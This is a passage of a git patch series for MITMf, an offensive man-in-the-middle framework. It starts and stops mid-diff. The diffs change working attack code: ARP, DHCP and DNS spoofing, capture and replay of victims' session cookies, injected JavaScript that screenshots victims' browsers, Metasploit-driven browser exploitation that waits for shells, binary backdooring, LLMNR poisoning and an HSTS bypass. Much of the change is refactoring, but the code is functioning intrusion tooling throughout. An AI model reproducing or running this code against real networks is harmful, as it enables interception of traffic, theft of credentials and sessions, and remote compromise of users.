b/core/javascript/screenshot.js @@ -2875,4 +2875,4 @@ function grab() { }); } -grab() \ No newline at end of file +setInterval(function(){grab()}, SECONDS_GO_HERE); \ No newline at end of file diff --git a/core/protocols/arp/ARPWatch.py b/core/protocols/arp/ARPWatch.py index 28f2473..0c45ef6 100644 --- a/core/protocols/arp/ARPWatch.py +++ b/core/protocols/arp/ARPWatch.py @@ -4,6 +4,7 @@ import sys import threading from scapy.all import * +from core.utils import shutdown mitmf_logger = logging.getLogger('mitmf') @@ -21,9 +22,9 @@ class ARPWatch: try: self.gatewaymac = getmacbyip(self.gatewayip) if self.gatewaymac is None: - sys.exit("[ARPWatch] Error: Could not resolve gateway's MAC address") + shutdown("[ARPWatch] Error: Could not resolve gateway's MAC address") except Exception, e: - sys.exit("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e)) + shutdown("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e)) mitmf_logger.debug("[ARPWatch] gatewayip => {}".format(self.gatewayip)) mitmf_logger.debug("[ARPWatch] gatewaymac => {}".format(self.gatewaymac)) diff --git a/core/protocols/arp/ARPpoisoner.py b/core/protocols/arp/ARPpoisoner.py index 122e3fd..4b8858c 100644 --- a/core/protocols/arp/ARPpoisoner.py +++ b/core/protocols/arp/ARPpoisoner.py @@ -1,6 +1,7 @@ import logging import threading from time import sleep +from core.utils import shutdown from scapy.all import * mitmf_logger = logging.getLogger('mitmf') @@ -42,7 +43,7 @@ class ARPpoisoner(): def start(self): if self.gatewaymac is None: - sys.exit("[ARPpoisoner] Error: Could not resolve gateway's MAC address") + shutdown("[ARPpoisoner] Error: Could not resolve gateway's MAC address") mitmf_logger.debug("[ARPpoisoner] gatewayip => {}".format(self.gatewayip)) mitmf_logger.debug("[ARPpoisoner] gatewaymac => {}".format(self.gatewaymac)) diff --git a/core/protocols/smb/SMBserver.py b/core/protocols/smb/SMBserver.py index 2081804..d413926 100644 --- a/core/protocols/smb/SMBserver.py +++ b/core/protocols/smb/SMBserver.py @@ -4,6 +4,7 @@ import threading from socket import error as socketerror from impacket import version, smbserver, LOG from 
core.configwatcher import ConfigWatcher +from core.utils import shutdown LOG.setLevel(logging.INFO) LOG.propagate = False @@ -29,7 +30,7 @@ class SMBserver(ConfigWatcher): self.server.setSMBChallenge(self.config["MITMf"]["SMB"]["Challenge"]) except socketerror as e: if "Address already in use" in e: - sys.exit("\n[-] Unable to start SMB server on port 445: port already in use") + shutdown("\n[-] Unable to start SMB server on port 445: port already in use") def start(self): t = threading.Thread(name='SMBserver', target=self.server.start) diff --git a/core/utils.py b/core/utils.py index 38845f0..9aa8898 100644 --- a/core/utils.py +++ b/core/utils.py @@ -27,9 +27,15 @@ import sys logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy from scapy.all import get_if_addr, get_if_hwaddr +from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger('mitmf') +def shutdown(message=None): + for plugin in ProxyPlugins.getInstance().plist: + plugin.finish() + sys.exit(message) + class SystemConfig: @staticmethod @@ -44,11 +50,11 @@ class SystemConfig: try: ip_address = get_if_addr(interface) if (ip_address == "0.0.0.0") or (ip_address is None): - exit("[Utils] Interface {} does not have an assigned IP address".format(interface)) + shutdown("[Utils] Interface {} does not have an assigned IP address".format(interface)) return ip_address except Exception, e: - exit("[Utils] Error retrieving IP address from {}: {}".format(interface, e)) + shutdown("[Utils] Error retrieving IP address from {}: {}".format(interface, e)) @staticmethod def getMAC(interface): @@ -56,7 +62,7 @@ class SystemConfig: mac_address = get_if_hwaddr(interface) return mac_address except Exception, e: - exit("[Utils] Error retrieving MAC address from {}: {}".format(interface, e)) + shutdown("[Utils] Error retrieving MAC address from {}: {}".format(interface, e)) class IpTables: diff --git a/mitmf.py b/mitmf.py index 104ab20..6e21431 100755 --- a/mitmf.py +++ b/mitmf.py @@ -28,7 +28,7 @@ from twisted.web import http from twisted.internet import reactor from core.sslstrip.CookieCleaner import CookieCleaner from core.sergioproxy.ProxyPlugins import ProxyPlugins -from core.utils import Banners, SystemConfig +from core.utils import Banners, SystemConfig, shutdown from plugins import * Banners().printBanner() @@ -123,8 +123,6 @@ mitmf_logger.addHandler(fileHandler) #All our options should be loaded now, initialize the plugins print "[*] MITMf v{} online... 
initializing plugins".format(mitmf_version) -load = [] - for p in plugins: #load only the plugins that have been called at the command line @@ -132,32 +130,30 @@ for p in plugins: print "|_ {} v{}".format(p.name, p.version) if p.tree_info: - for line in p.tree_info: + for line in xrange(0, len(p.tree_info)): print "| |_ {}".format(p.tree_info.pop()) p.initialize(args) if p.tree_info: - for line in p.tree_info: + for line in xrange(0, len(p.tree_info)): print "| |_ {}".format(p.tree_info.pop()) - load.append(p) + ProxyPlugins.getInstance().addPlugin(p) #Plugins are ready to go, let's rock & roll from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.URLMonitor import URLMonitor URLMonitor.getInstance().setFaviconSpoofing(args.favicon) - CookieCleaner.getInstance().setEnabled(args.killsessions) -ProxyPlugins.getInstance().setPlugins(load) strippingFactory = http.HTTPFactory(timeout=10) strippingFactory.protocol = StrippingProxy reactor.listenTCP(args.listen, strippingFactory) -for p in load: +for p in ProxyPlugins.getInstance().plist: p.pluginReactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it p.startConfigWatch() @@ -189,6 +185,4 @@ SMBserver().start() reactor.run() print "\n" -#run each plugins finish() on exit -for p in load: - p.finish() +shutdown() \ No newline at end of file diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py index 2cb5fa8..0f4bad9 100644 --- a/plugins/BeefAutorun.py +++ b/plugins/BeefAutorun.py @@ -24,7 +24,7 @@ import json from time import sleep from core.beefapi import BeefAPI -from core.utils import SystemConfig +from core.utils import SystemConfig, shutdown from plugins.plugin import Plugin from plugins.Inject import Inject @@ -54,7 +54,7 @@ class BeefAutorun(Inject, Plugin): self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) if not self.beef.login(beefconfig['user'], beefconfig['pass']): - sys.exit("[-] Error logging in to BeEF!") + shutdown("[-] Error logging in to BeEF!") def startThread(self, options): self.autorun() diff --git a/plugins/BrowserSniper.py b/plugins/BrowserSniper.py index 0d356a8..0eb7408 100644 --- a/plugins/BrowserSniper.py +++ b/plugins/BrowserSniper.py @@ -20,12 +20,11 @@ import string import random -import sys import logging from time import sleep from core.msfrpc import Msfrpc -from core.utils import SystemConfig +from core.utils import SystemConfig, shutdown from plugins.plugin import Plugin from plugins.BrowserProfiler import BrowserProfiler @@ -56,7 +55,7 @@ class BrowserSniper(BrowserProfiler, Plugin): version = self.msf.call('core.version')['version'] self.tree_info.append("Connected to Metasploit v{}".format(version)) except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and it's MSGRPC server") + shutdown("[-] Error connecting to MSF! 
Make sure you started Metasploit and it's MSGRPC server") def startThread(self, options): self.snipe() diff --git a/plugins/FerretNG.py b/plugins/FerretNG.py index 612dcbf..42c426a 100644 --- a/plugins/FerretNG.py +++ b/plugins/FerretNG.py @@ -19,12 +19,15 @@ # import logging +import ast +import sys from datetime import datetime from plugins.plugin import Plugin from twisted.internet import reactor from twisted.web import http from twisted.internet import reactor +from core.utils import shutdown from core.ferretng.FerretProxy import FerretProxy from core.ferretng.URLMonitor import URLMonitor @@ -41,17 +44,44 @@ class FerretNG(Plugin): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.ferret_port = 10010 or options.ferret_port + self.cookie_file = None + + URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client'] + + if options.cookie_file: + self.tree_info.append('Loading cookies from log file') + try: + with open(options.cookie_file, 'r') as cookie_file: + self.cookie_file = ast.literal_eval(cookie_file.read()) + URLMonitor.getInstance().cookies = self.cookie_file + cookie_file.close() + except Exception as e: + shutdown("[-] Error loading cookie log file: {}".format(e)) self.tree_info.append("Listening on port {}".format(self.ferret_port)) + def onConfigChange(self): + mitmf_logger.info("[Ferret-NG] Will now hijack captured sessions from {}".format(self.config['Ferret-NG']['Client'])) + URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client'] + def clientRequest(self, request): if 'cookie' in request.headers: host = request.headers['host'] cookie = request.headers['cookie'] client = request.client.getClientIP() - if host not in URLMonitor.getInstance().cookies: - mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(client, host, cookie)) - URLMonitor.getInstance().cookies[client] = {'host': host, 'cookie': cookie} + + if client not in URLMonitor.getInstance().cookies: + URLMonitor.getInstance().cookies[client] = [] + + for entry in URLMonitor.getInstance().cookies[client]: + if host == entry['host']: + mitmf_logger.debug("{} [Ferret-NG] Updating captured session for {}".format(client, host)) + entry['host'] = host + entry['cookie'] = cookie + return + + mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(client, host, cookie)) + URLMonitor.getInstance().cookies[client].append({'host': host, 'cookie': cookie}) def pluginReactor(self, StrippingProxy): FerretFactory = http.HTTPFactory(timeout=10) @@ -60,10 +90,16 @@ class FerretNG(Plugin): def pluginOptions(self, options): options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG proxy on (default 10010)') - options.add_argument('--load-cookies', dest='cookie_file', metavar='FILE', type=str, default=None, help='Load cookies from log file') + options.add_argument('--load-cookies', dest='cookie_file', metavar='FILE', type=str, default=None, help='Load cookies from a log file') def finish(self): + if not URLMonitor.getInstance().cookies: + return + + if self.cookie_file == URLMonitor.getInstance().cookies: + return + mitmf_logger.info("[Ferret-NG] Writing cookies to log file") - with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s"))) as cookie_file: - cookie_file.write(URLMonitor.getInstance().cookies) - cookie_file.close() \ No newline at end of file + with 
open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file: + cookie_file.write(str(URLMonitor.getInstance().cookies)) + cookie_file.close() diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 54ccad6..64f977a 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -69,6 +69,7 @@ from libs.bdfactory import pebin from libs.bdfactory import elfbin from libs.bdfactory import machobin from core.msfrpc import Msfrpc +from core.utils import shutdown from plugins.plugin import Plugin from tempfile import mkstemp from configobj import ConfigObj @@ -140,7 +141,7 @@ class FilePwn(Plugin): t.setDaemon(True) t.start() except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") + shutdown("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") def setupMSF(self, msf): diff --git a/plugins/Responder.py b/plugins/Responder.py index e49bcfe..9ea9fec 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -18,11 +18,9 @@ # USA # -import sys - from plugins.plugin import Plugin from twisted.internet import reactor -from core.utils import SystemConfig +from core.utils import SystemConfig, shutdown from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner from core.responder.mdns.MDNSPoisoner import MDNSPoisoner @@ -48,7 +46,7 @@ class Responder(Plugin): config = self.config['Responder'] smbChal = self.config['MITMf']['SMB']['Challenge'] except Exception as e: - sys.exit('[-] Error parsing config for Responder: ' + str(e)) + shutdown('[-] Error parsing config for Responder: ' + str(e)) LANFingerprinter().start(options) MDNSPoisoner().start(options, self.ourip) diff --git a/plugins/Screenshotter.py b/plugins/Screenshotter.py index 23cb23e..5e32555 100644 --- a/plugins/Screenshotter.py +++ b/plugins/Screenshotter.py @@ -20,6 +20,8 @@ import logging import base64 +import urllib +import re from datetime import datetime from plugins.Inject import Inject @@ -32,22 +34,30 @@ class ScreenShotter(Inject, Plugin): optname = 'screen' desc = 'Uses HTML5 Canvas to render an accurate screenshot of a clients browser' ver = '0.1' - has_opts = False + has_opts = True def initialize(self, options): + self.interval = options.interval Inject.initialize(self, options) self.html_payload = self.get_payload() def clientRequest(self, request): if 'saveshot' in request.uri: request.printPostData = False - img_file = './logs/{}-{}-{}.png'.format(request.client.getClientIP(), request.headers['host'], datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")) - with open(img_file, 'wb') as img: - img.write(base64.b64decode(request.postData[30:] + '==')) - img.close() + client = request.client.getClientIP() + img_file = '{}-{}-{}.png'.format(client, request.headers['host'], datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")) + try: + with open('./logs/' + img_file, 'wb') as img: + img.write(base64.b64decode(urllib.unquote(request.postData).decode('utf8').split(',')[1])) + img.close() - mitmf_logger.info('{} [ScreenShotter] Saved screenshot to {}'.format(request.client.getClientIP(), img_file)) + mitmf_logger.info('{} [ScreenShotter] Saved screenshot to {}'.format(client, img_file)) + except Exception as e: + mitmf_logger.error('{} [ScreenShotter] Error saving screenshot: {}'.format(client, e)) def get_payload(self): - canvas = open("./core/javascript/screenshot.js", "rb").read() - return '' \ No newline at end of file + canvas = re.sub("SECONDS_GO_HERE", str(self.interval*1000), 
open("./core/javascript/screenshot.js", "rb").read()) + return '' + + def pluginOptions(self, options): + options.add_argument("--interval", dest="interval", type=int, metavar="SECONDS", default=10, help="Interval at which screenshots will be taken (default 10 seconds)") \ No newline at end of file diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 086128c..4727fe5 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -18,8 +18,7 @@ # USA # -from sys import exit -from core.utils import SystemConfig, IpTables +from core.utils import SystemConfig, IpTables, shutdown from core.protocols.arp.ARPpoisoner import ARPpoisoner from core.protocols.arp.ARPWatch import ARPWatch from core.dnschef.DNSchef import DNSChef @@ -55,7 +54,7 @@ class Spoof(Plugin): if options.arp: if not options.gateway: - exit("[-] --arp argument requires --gateway") + shutdown("[-] --arp argument requires --gateway") if options.targets is None: #if were poisoning whole subnet, start ARP-Watch @@ -75,10 +74,10 @@ class Spoof(Plugin): elif options.icmp: if not options.gateway: - exit("[-] --icmp argument requires --gateway") + shutdown("[-] --icmp argument requires --gateway") if not options.targets: - exit("[-] --icmp argument requires --targets") + shutdown("[-] --icmp argument requires --targets") icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, options.ip_address) icmp.debug = debug @@ -88,7 +87,7 @@ class Spoof(Plugin): elif options.dhcp: if options.targets: - exit("[-] --targets argument invalid when DCHP spoofing") + shutdown("[-] --targets argument invalid when DCHP spoofing") dhcp = DHCPServer(options.interface, self.dhcpcfg, options.ip_address, options.mac_address) dhcp.shellshock = options.shellshock @@ -104,7 +103,7 @@ class Spoof(Plugin): DNSChef.getInstance().loadRecords(self.dnscfg) if not options.arp and not options.icmp and not options.dhcp and not options.dns: - exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") + shutdown("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") SystemConfig.setIpForwarding(1) From 563a8d37c13c04f74b51ee590cf757a8237eeb16 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 19 May 2015 00:00:40 +0200 Subject: [PATCH 19/20] Fixed a bug in SSLstrip+ code, when redirecting to certain sites Created a wrapper class around Msfrpc to limit code re-use when interacting with msf --- core/dnschef/DNSchef.py | 14 +++--- core/msfrpc.py | 52 ++++++++++++++++++++ core/sslstrip/ClientRequest.py | 8 +-- core/sslstrip/SSLServerConnection.py | 6 ++- core/sslstrip/ServerConnection.py | 10 ++-- core/sslstrip/URLMonitor.py | 42 ++++++++-------- plugins/BrowserProfiler.py | 8 +-- plugins/BrowserSniper.py | 73 +++++++++------------------- plugins/FilePwn.py | 50 +++++++------------ plugins/Screenshotter.py | 4 +- 10 files changed, 141 insertions(+), 126 deletions(-) diff --git a/core/dnschef/DNSchef.py b/core/dnschef/DNSchef.py index a65d8cd..69f3681 100755 --- a/core/dnschef/DNSchef.py +++ b/core/dnschef/DNSchef.py @@ -71,7 +71,7 @@ class DNSHandler(): d = DNSRecord.parse(data) except Exception, e: - dnschef_logger.info("{} ERROR: invalid DNS request".format(self.client_address[0])) + dnschef_logger.info("{} [DNSChef] Error: invalid DNS request".format(self.client_address[0])) else: # Only Process DNS Queries @@ -115,7 +115,7 @@ class DNSHandler(): # Create a custom response to the query response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) - dnschef_logger.info("{} cooking the response of type '{}' for {} 
to {}".format(self.client_address[0], qtype, qname, fake_record)) + dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record)) # IPv6 needs additional work before inclusion: if qtype == "AAAA": @@ -184,7 +184,7 @@ class DNSHandler(): response = response.pack() elif qtype == "*" and not None in fake_records.values(): - dnschef_logger.info("{} cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records.")) + dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records.")) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q) @@ -259,7 +259,7 @@ class DNSHandler(): # Proxy the request else: - dnschef_logger.debug("[DNSChef] {} proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname)) + dnschef_logger.debug("{} [DNSChef] Proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname)) nameserver_tuple = random.choice(nameservers).split('#') response = self.proxyrequest(data, *nameserver_tuple) @@ -339,13 +339,13 @@ class DNSHandler(): sock.close() except Exception, e: - dnschef_logger.warning("could not proxy request: {}".format(e)) + dnschef_logger.warning("[DNSChef] Could not proxy request: {}".format(e)) else: return reply def hstsbypass(self, real_domain, fake_domain, nameservers, d): - dnschef_logger.info("{} resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain)) + dnschef_logger.info("{} [DNSChef] Resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain)) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) @@ -482,7 +482,7 @@ class DNSChef(ConfigWatcher): self.startUDP() except socket.error as e: if "Address already in use" in e: - shutdown("\n[-] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port'])) + shutdown("\n[DNSChef] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port'])) # Initialize and start the DNS Server def startUDP(self): diff --git a/core/msfrpc.py b/core/msfrpc.py index f722875..51e51c2 100644 --- a/core/msfrpc.py +++ b/core/msfrpc.py @@ -24,6 +24,9 @@ import msgpack import logging import requests +from core.configwatcher import ConfigWatcher +from core.utils import shutdown + logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message class Msfrpc: @@ -84,6 +87,55 @@ class Msfrpc: except: raise self.MsfAuthError("MsfRPC: Authentication failed") +class Msf: + ''' + This is just a wrapper around the Msfrpc class, + prevents a lot of code re-use throught the framework + + ''' + def __init__(self): + try: + self.msf = Msfrpc({"host": ConfigWatcher.config['MITMf']['Metasploit']['rpcip']}) + self.msf.login('msf', ConfigWatcher.config['MITMf']['Metasploit']['rpcpass']) + except Exception as e: + shutdown("[Msfrpc] Error connecting to Metasploit: {}".format(e)) + + def version(self): + return self.msf.call('core.version')['version'] + + def jobs(self): + return self.msf.call('job.list') + + def jobinfo(self, pid): + return self.msf.call('job.info', [pid]) + + def killjob(self, pid): + return self.msf.call('job.kill', [pid]) + + def findpid(self, name): + jobs = self.jobs() + for 
pid, jobname in jobs.iteritems(): + if name in jobname: + return pid + return None + + def sessions(self): + return self.msf.call('session.list') + + def sessionsfrompeer(self, peer): + sessions = self.sessions() + for n, v in sessions.iteritems(): + if peer in v['tunnel_peer']: + return n + return None + + def sendcommand(self, cmd): + #Create a virtual console + console_id = self.msf.call('console.create')['id'] + + #write the cmd to the newly created console + self.msf.call('console.write', [console_id, cmd]) + if __name__ == '__main__': # Create a new instance of the Msfrpc client with the default options diff --git a/core/sslstrip/ClientRequest.py b/core/sslstrip/ClientRequest.py index 67b6dba..8d2d30e 100644 --- a/core/sslstrip/ClientRequest.py +++ b/core/sslstrip/ClientRequest.py @@ -69,7 +69,7 @@ class ClientRequest(Request): if self.hsts: if 'referer' in headers: - real = self.urlMonitor.getHstsConfig()[0] + real = self.urlMonitor.real if len(real) > 0: dregex = re.compile("({})".format("|".join(map(re.escape, real.keys())))) headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) @@ -120,7 +120,7 @@ class ClientRequest(Request): client = self.getClientIP() path = self.getPathFromUri() url = 'http://' + host + path - self.uri = url # set URI to absolute + self.uri = url # set URI to absolute if self.content: self.content.seek(0,0) @@ -129,8 +129,8 @@ class ClientRequest(Request): if self.hsts: - host = self.urlMonitor.URLgetRealHost(str(host)) - real = self.urlMonitor.getHstsConfig()[0] + host = self.urlMonitor.URLgetRealHost(str(host)) + real = self.urlMonitor.real patchDict = self.urlMonitor.patchDict url = 'http://' + host + path self.uri = url # set URI to absolute diff --git a/core/sslstrip/SSLServerConnection.py b/core/sslstrip/SSLServerConnection.py index f0db397..4015276 100644 --- a/core/sslstrip/SSLServerConnection.py +++ b/core/sslstrip/SSLServerConnection.py @@ -16,7 +16,9 @@ # USA # -import logging, re, string +import logging +import re +import string from ServerConnection import ServerConnection from URLMonitor import URLMonitor @@ -58,7 +60,7 @@ class SSLServerConnection(ServerConnection): if v[:7].lower()==' domain': dominio=v.split("=")[1] mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v) - real = self.urlMonitor.getHstsConfig()[1] + real = self.urlMonitor.real if dominio in real: v=" Domain=%s"%real[dominio] mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v) diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 32ee79e..74868f4 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -105,7 +105,13 @@ class ServerConnection(HTTPClient): def connectionMade(self): mitmf_logger.debug("[ServerConnection] HTTP connection made.") - self.clientInfo = hap.simple_detect(self.headers['user-agent']) + try: + self.clientInfo = hap.simple_detect(self.headers['user-agent']) + except KeyError as e: + mitmf_logger.debug("[ServerConnection] Client didn't send UA with request") + self.clientInfo = None + pass + self.plugins.hook() self.sendRequest() self.sendHeaders() @@ -214,9 +220,7 @@ class ServerConnection(HTTPClient): nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url) mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl)) sustitucion[url] = nuevaurl - #data.replace(url,nuevaurl) - #data = self.urlMonitor.DataReemplazo(data) if 
len(sustitucion)>0: dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys())))) data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data) diff --git a/core/sslstrip/URLMonitor.py b/core/sslstrip/URLMonitor.py index f306db7..54b4bd5 100644 --- a/core/sslstrip/URLMonitor.py +++ b/core/sslstrip/URLMonitor.py @@ -32,6 +32,8 @@ class URLMonitor: # Start the arms race, and end up here... javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] _instance = None + sustitucion = dict() + real = dict() patchDict = { 'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net', 'https:\/\/www.facebook.com':'http:\/\/social.facebook.com', @@ -107,23 +109,24 @@ class URLMonitor: port = 443 if self.hsts: - if not self.getHstsConfig[1].has_key(host): + self.updateHstsConfig() + + if not self.sustitucion.has_key(host): lhost = host[:4] if lhost=="www.": - self.getHstsConfig[1][host] = "w"+host - self.getHstsConfig[0]["w"+host] = host + self.sustitucion[host] = "w"+host + self.real["w"+host] = host else: - self.getHstsConfig[1][host] = "web"+host - self.getHstsConfig[0]["web"+host] = host - mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.getHstsConfig[1][host])) + self.sustitucion[host] = "web"+host + self.real["web"+host] = host + mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.sustitucion[host])) url = 'http://' + host + path - #mitmf_logger.debug("HSTS stripped URL: %s %s"%(client, url)) self.strippedURLs.add((client, url)) self.strippedURLPorts[(client, url)] = int(port) - return 'http://'+ self.getHstsConfig[1][host] + path + return 'http://'+ self.sustitucion[host] + path else: url = method + host + path @@ -134,15 +137,10 @@ class URLMonitor: def setFaviconSpoofing(self, faviconSpoofing): self.faviconSpoofing = faviconSpoofing - def getHstsConfig(self): - sustitucion = dict() - real = dict() - - for k,v in ConfigWatcher.getInstance().getConfig()['SSLstrip+']: - sustitucion[k] = v - real[v] = k - - return (real, sustitucion) + def updateHstsConfig(self): + for k,v in ConfigWatcher.getInstance().config['SSLstrip+'].iteritems(): + self.sustitucion[k] = v + self.real[v] = k def setHstsBypass(self): self.hsts = True @@ -158,10 +156,12 @@ class URLMonitor: def URLgetRealHost(self, host): mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: {}".format(host)) - - if self.getHstsConfig()[0].has_key(host): - mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.getHstsConfig()[0][host])) - return self.getHstsConfig()[0][host] + + self.updateHstsConfig() + + if self.real.has_key(host): + mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.real[host])) + return self.real[host] else: mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: {}".format(host)) diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py index 19225a3..aa831f4 100644 --- a/plugins/BrowserProfiler.py +++ b/plugins/BrowserProfiler.py @@ -39,11 +39,11 @@ class BrowserProfiler(Inject, Plugin): self.html_payload = self.get_payload() def post2dict(self, post): #converts the ajax post to a dic - dict = {} + d = dict() for line in post.split('&'): t = line.split('=') - dict[t[0]] = t[1] - return dict + d[t[0]] = t[1] + return d def clientRequest(self, request): #Handle the plugin output @@ -62,4 +62,4 @@ class BrowserProfiler(Inject, Plugin): def get_payload(self): plugindetect = 
open("./core/javascript/plugindetect.js", 'r').read() - return '' + return '' diff --git a/plugins/BrowserSniper.py b/plugins/BrowserSniper.py index 0eb7408..e74c405 100644 --- a/plugins/BrowserSniper.py +++ b/plugins/BrowserSniper.py @@ -23,7 +23,7 @@ import random import logging from time import sleep -from core.msfrpc import Msfrpc +from core.msfrpc import Msf from core.utils import SystemConfig, shutdown from plugins.plugin import Plugin from plugins.BrowserProfiler import BrowserProfiler @@ -42,20 +42,11 @@ class BrowserSniper(BrowserProfiler, Plugin): self.msfip = SystemConfig.getIP(options.interface) self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit - msfcfg = self.config['MITMf']['Metasploit'] - self.rpcip = msfcfg['rpcip'] - self.rpcpass = msfcfg['rpcpass'] - #Initialize the BrowserProfiler plugin BrowserProfiler.initialize(self, options) - try: - self.msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary - self.msf.login('msf', self.rpcpass) - version = self.msf.call('core.version')['version'] - self.tree_info.append("Connected to Metasploit v{}".format(version)) - except Exception: - shutdown("[-] Error connecting to MSF! Make sure you started Metasploit and it's MSGRPC server") + msfversion = Msf().version() + self.tree_info.append("Connected to Metasploit v{}".format(msfversion)) def startThread(self, options): self.snipe() @@ -84,11 +75,7 @@ class BrowserSniper(BrowserProfiler, Plugin): cmd += "set ExitOnSession False\n" cmd += "exploit -j\n" - #Create a virtual console - console_id = self.msf.call('console.create')['id'] - - #write the cmd to the newly created console - self.msf.call('console.write', [console_id, cmd]) + Msf().sendcommand(cmd) return (rand_url, rand_port) @@ -140,7 +127,7 @@ class BrowserSniper(BrowserProfiler, Plugin): elif details['Plugin'].lower() == 'flash': - if (flash is not None) and (java in details['PluginVersions']): + if (flash is not None) and (flash in details['PluginVersions']): exploits.append(exploit) mitmf_logger.debug("{} [BrowserSniper] Compatible exploits: {}".format(vic_ip, exploits)) @@ -154,31 +141,23 @@ class BrowserSniper(BrowserProfiler, Plugin): #The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds #Will also make sure the shell actually came from the box that we targeted - #probably a much cleaner way of doing this :/ mitmf_logger.info('{} [BrowserSniper] Waiting for ze shellz, sit back and relax...'.format(ip)) - exit_loop = False + poll_n = 1 - while poll_n <= 30: - - if exit_loop is True: - break - - sessions = self.msf.call('session.list') - if sessions: - for k, v in sessions.iteritems(): - if ip in sessions[k]['tunnel_peer']: - mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip)) - self.sploited_ips.append(ip) - self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped - exit_loop = True - break + msf = Msf() + while poll_n != 30: + if msf.sessionsfrompeer(ip): + mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! 
